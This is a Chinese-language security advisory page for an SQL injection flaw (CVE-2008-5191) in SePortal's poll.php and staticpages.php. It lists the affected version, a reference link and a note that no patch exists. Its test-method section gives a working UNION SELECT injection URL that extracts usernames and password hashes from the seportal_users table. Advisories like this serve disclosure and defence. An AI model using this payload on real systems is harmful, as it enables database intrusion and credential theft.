当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

SePortal \'poll.php\' SQL注入漏洞

     发表日期:2014-11-26 16:41:09

SePortal \'poll.php\' SQL注入漏洞

BugTraq-ID:29996

CVE-ID:CVE-2008-5191

发布日期:2008-06-28

更新日期:2008-06-28

受影响系统:

seportal seportal 2.5

详细信息:

SePortal是网络日志系统。 SePortal 2.4及其他版本在实现上存在SQL注入漏洞,远程攻击者通过发送构造的SQL语句到poll.php或staticpages.php脚本(带poll_id或sp_id参数),利用此漏洞可在后端数据库中执行未授权操作。

来源:

Mr.SQL

参考信息:

http://xforce.iss.net/xforce/xfdb/43450

测试方法:

警告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/poll.php?poll_id=1\'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/*

解决办法:

厂商补丁:

seportal

--------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.seportal.org/